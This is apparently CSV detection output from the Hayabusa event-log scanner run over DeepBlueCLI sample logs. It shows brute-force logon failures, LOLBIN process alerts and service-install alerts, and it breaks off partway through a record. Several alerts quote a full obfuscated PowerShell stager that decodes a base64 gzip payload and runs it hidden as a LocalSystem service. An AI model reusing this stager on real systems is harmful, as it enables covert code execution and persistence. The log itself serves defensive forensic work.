Administrator | Type: 3 | Computer: USfEwKkH8OUADVds | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y0jg1i6tDiInd10i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv2jRzrgoP6lJdAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LmuAXUwSkhR3tSRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zy4Fkpvcrlmp9AES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 51ipUXvrRh0CPH1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TB15XKzVJwIyjqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i1F6muFPBlPyHPbR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XNXwYS73RElHozUo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ft1MLPJISeq0bMsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8kbFOwQiCyRVMDV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ToPzuDEmXN1fjIcS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pKF1QKEuTXIGnrx2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fyHpo6pX8TEo6ttv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uYqEt90yr8B3rK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LKkrM0slVn0CKHw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyJ82cfaddnc8c6D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: KJRw0S82SupmuS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4lSo9BMWdcPLfLb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XreSLg472qhJw0R3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIJcQJKLmnjrE2T9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlddo3GCTEIkFyi9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hxiZoB5mHR2tGUFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fpEbpiox2Q3Qf8av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:54:20.959 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x438 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:55:28.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x338 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:55:39.187 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x658 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:48.712 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\8xpeyiyp.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf4 | User: IEUser | LID: 
0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:48.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ud-vxj7k.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x840 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:49.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gsxogihi.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x2f8 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:49.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\owummvtl.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xe48 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:49.183 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:49.891 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xfb0 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:49.912 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x184 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG
1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8Kj